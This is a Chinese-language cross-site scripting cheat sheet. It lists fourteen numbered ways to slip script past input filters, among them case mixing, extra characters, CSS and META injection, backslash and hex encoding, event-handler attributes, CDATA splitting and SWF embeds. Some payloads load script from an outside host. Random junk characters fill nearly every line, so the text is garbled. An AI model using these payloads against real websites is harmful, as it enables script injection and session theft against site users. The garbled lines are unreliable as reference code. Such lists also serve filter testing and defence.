1. 改变字符大小写
$ b* C* o7 D, E. {
( a# S0 b- U+ e/ L3 g% g5 d" X ! K C# B& a9 u! A
+ X- z/ r) P4 [$ G. s. l
<sCript>alert(‘d’)</scRipT>
4 X2 x( J V5 C, R0 J
9 B/ L$ Z6 c. p2. 利用多加一些其它字符来规避Regular Expression的检查
' F: T# w# r5 b4 l4 ^" Q; ~7 S# Y7 f* ~8 n$ [( h8 t
<<script>alert(‘c’)//<</script>
! w P8 O' U/ H- j* Z4 s7 o4 p# n5 R0 W) J, v2 }; i7 C
<SCRIPT a=">" SRC="t.js"></SCRIPT>9 a- y( T0 ~2 |* H" b
: _" R3 u; l) [
<SCRIPT =">" SRC="t.js"></SCRIPT>: `3 C7 }% N$ T9 O6 `
/ a: V) @+ i4 f* w; C <SCRIPT a=">" ” SRC="t.js"></SCRIPT>0 _$ c, C# L. x& { I3 |; i
* W+ _& u7 z( }. W4 h7 Z. v3 I7 v
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>. \: n0 \: J; v9 ]( e0 f3 y" z
8 u7 c$ N" I: L9 o* X. K <SCRIPT a=`>` SRC="t.js"></SCRIPT>
s9 U% m4 A2 p6 U
( m8 s, H j) m' v% ^ <SCRIPT a=">’>" SRC="t.js"></SCRIPT>) ]( i6 f4 y3 U5 E2 {
; E! `1 |5 B R0 P' W) j" h1 |
3. 以其它扩展名取代.js
6 e' n) X5 t L* t5 _0 k( j+ J
<script src="bad.jpg"></script>
8 V3 {( {$ ~- G& g4 M1 ^; e) ]/ }2 e- _; R" ^+ H( E
4. 将Javascript写在CSS档里
* d- @; e; P8 }. j- z& g$ q: I3 ?( X( l
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
" V6 a7 N8 j$ g9 I5 n# O
7 L! u1 d, {3 I; g3 s! S example:8 v% C$ R) E% j) ~2 O( D. b
* @/ Z6 a' t1 \) @ @: U" V0 y8 v
body {
: B; D" Y9 ]* q1 ]/ c0 y7 H4 R- j/ @
background-image: url(‘javascript:alert("XSS");’)" U1 x9 T! P) p2 b# [; h2 u
! ~" m2 p* H* R5 O7 ^( Y9 s5 I! K6 b }
0 x7 {9 e0 z0 n; L+ X; ^$ O: U( @4 z6 l
5. 在script的tag里加入一些其它字符, }0 {' o2 S" N2 G( j% L1 I. J
' j- _6 P+ P1 ]+ P+ y( D <SCRIPT/SRC="t.js"></SCRIPT>% @3 F2 P" O; Y, X! d5 B
; ^; B) U/ ?; h2 Q( y; \9 c <SCRIPT/anyword SRC="t.js"></SCRIPT>
! t3 n3 t% a. I L9 Y0 e
& d) e0 b9 }5 i' W; q6. 使用tab或是new line来规避
, w q0 }0 @: h. k( x- j" j9 W$ Z' f- M, d% ?; [! Y# S
<img src="jav ascr ipt:alert(‘XSS3′)">
% t0 A0 f p3 e" c$ r8 Z) B1 [1 G) S( {( i- m
<img src="jav ascr ipt:alert(‘XSS3′)">$ } }8 K# {: p
9 V2 R: L( N% p' q; L+ c% f
<IMG SRC="jav ascript:alert(‘XSS’);">: {1 e) @1 x) U4 z3 h$ v
; G [# \3 t& ?' a1 t4 S8 W$ e8 y& p
-> tag. l. q u3 C2 X2 k, \
5 d5 M' c) f) A8 ^' @$ Y0 O
-> new line
, C) Q o6 x6 H3 h5 G; j
$ P) i7 c) y3 v3 r4 G Z/ S7. 使用"\"来规避1 ~- q9 O6 s; X! C$ j: @, t
0 M9 ]! ~/ t2 h. W( b) Y7 q, L/ V
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
( c& J9 g1 d5 e& S- Z; i) W3 E% X) u( z
* t3 p9 ^9 S8 I: T) I; A <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
- Y4 s9 J- _- o9 X% A
, g4 B1 v( t! j i, z1 o# B: ~7 T <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
! W' W$ u: e3 t' J' D6 t9 A# S
' R$ c1 b5 f" ?% N$ z <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: _! ~; ^ I7 E% v; l
' l, w/ r( D" E l5 E. v3 U) D5 m <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>, b5 y5 @& z5 Q5 i, P
; Y, J8 ~# ?5 w2 a8 a4 i0 E b. X
8. 使用Hex encode来规避(也可能会把";"拿掉)+ Z# n) ?; q% [& ]$ o
- K; `8 P' V9 i0 O$ h <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
7 l7 n- l' P5 }3 Q! j D
: Q2 N& E3 D* Y: z/ }, r 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
3 q% r( S3 `, B+ ]
0 Y# V) \' \5 J5 t& z <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
+ X$ _5 o! f- ]8 n# m/ F8 r9 n6 X7 I, K ~! [3 j
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">9 X6 t( P; r6 B) C$ M3 J
9 c) F# `) {. K2 F
9. script in HTML tag
" i- B: d' D9 m _* H. \
/ S; m5 i' u U9 L <body onload=」alert(‘onload’)」>
% ]9 N7 f7 |4 q% U G2 d0 T
, s) s( p$ W# i" Z' k onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload, g/ V, `7 [1 L+ x; R) b
: s/ H }* u! {2 S6 s0 a1 h10. 在swf里含有xss的code
% n( [) u2 E$ _; w+ K( Q: ^$ a- r r1 c5 A$ ~/ n9 x- k7 v
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>) ]7 O$ {, B `! I3 k
/ G) P2 S. k1 g- B
11. 利用CDATA将xss的code拆开,再组合起来。% M) J* }& O! \! w) M" ?. c; l. J
* ~ S. A" j( X, l( ?+ ^) w+ t <XML ID=I><X><C>
. w) S+ ]7 T. x8 k3 L
8 J4 T8 j0 E0 \" t% t/ l5 c5 l- t <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>7 w! \" t$ l; X/ M4 a' m
9 h1 t; T7 |; e8 E0 Y
</C></X>& K; z- v2 S0 C4 s7 k
: v" d( ~0 Y1 Y" W3 }0 p
</xml>' Y, l" ~% ~9 [# t/ p0 {$ i1 G1 U/ K
# m" c, r% V( G/ t9 U2 Y" Z5 q
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>+ i A# R, i4 i. J* P. [
& v+ m1 c& P: z# Z% g- f# n6 @ <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
1 O# m; x2 B, g6 w8 s7 A2 {, p- h' Y3 z( u
( k; ^# j8 k% [7 f, L/ B* S( q" L <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
/ u0 s+ I: W% ?8 h$ J$ z" n/ s [, g: k& M: n Z I
12. 利用HTML+TIME。
: [5 x9 ?- Q7 Z- Q- Z8 F! S5 j
. q! `) }9 z2 W, r1 p; [4 o( @ <HTML><BODY>) n6 J( h. M& t/ l. a- Z
w6 Y% I1 r3 V+ N9 r/ G. C
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> _" u- w7 O/ L) C @
8 O5 s+ S5 ?+ z% |# g
<?import namespace="t" implementation="#default#time2">' |' n p C2 H2 J1 s
! Z' T! Y1 i" G <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">0 F/ n v* y6 _! n1 H
1 |/ _2 j. ?8 K0 q5 i3 ]% V
</BODY></HTML>+ j6 C, Z* B; q7 }( T1 c8 _6 Q
- P! c1 \1 w! [1 o& Z) U13. 透过META写入Cookie。3 G- j) m: m! e3 c
* P/ f: m/ o: {, S( _ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
8 Y4 k' i2 Z+ \2 A" T4 V0 A! }/ M, l
14. javascript in src , href , url
1 N9 ^+ u$ z# n7 s4 {- b
4 O' J7 L/ ^! r( Q <IFRAME SRC=javascript:alert(’13′)></IFRAME>
4 A" N# M8 z' I0 _, X# N, B" I1 Z' j3 E$ o' |/ L
<img src="javascript:alert(‘XSS3′)">
, Q: _3 e( p7 H! _5 k2 i# i+ ?: W! M- m3 ~& [% p' f H
<IMG DYNSRC="javascript:alert(‘XSS20′)">3 {; G, p! J! c* n8 G
+ }0 r- S# t) K; S# m( [ <IMG LOWSRC="javascript:alert(‘XSS21′)">, e: @! J( u1 @/ i
( |1 x; z2 G; g7 r3 a/ Y0 ?0 | <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">) I5 J1 y2 `8 x% h4 S& S* k
/ y9 H1 E! L% J& D7 w$ n) B. H. h
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
" U4 r8 r3 h# v% f5 `
' V# o, g- v' c$ I4 q <TABLE BACKGROUND="javascript:alert(‘XSS29′)">& N* s; N& V4 K
3 ~( O& H6 z2 ^7 W
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
! D+ A0 P# X- j4 b2 S3 [. K7 u5 O* n8 w6 z
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}# w7 ?- D6 Q& w, z6 ^0 v( ]
( k4 l3 C, g) u% \ </STYLE><A CLASS=XSS></A>
$ } W( |9 E; m: y9 \9 g! i: w. W8 E% _7 L) J; S/ ^1 t V
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
. Q4 p- C; V* b8 O E7 G
$ G' o6 k! G% v |